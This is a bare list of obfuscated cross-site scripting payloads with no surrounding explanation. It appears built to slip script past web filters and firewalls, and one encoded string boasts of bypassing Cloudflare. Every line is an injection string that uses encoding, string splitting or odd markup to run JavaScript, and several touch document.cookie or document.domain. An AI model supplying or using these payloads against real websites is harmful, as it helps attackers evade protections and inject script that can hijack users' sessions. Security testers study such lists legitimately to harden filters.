<svg/onload=window["al"+"ert"]`1337`>
<img/src/onerror=alert&sol;**&sol;(3)>
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
<a href="javascript:alert`1337`">go</a>
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
&nvlt;svg onload=alert(1)>
<img/src/onerror=alert&#xFEFF;(1337)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
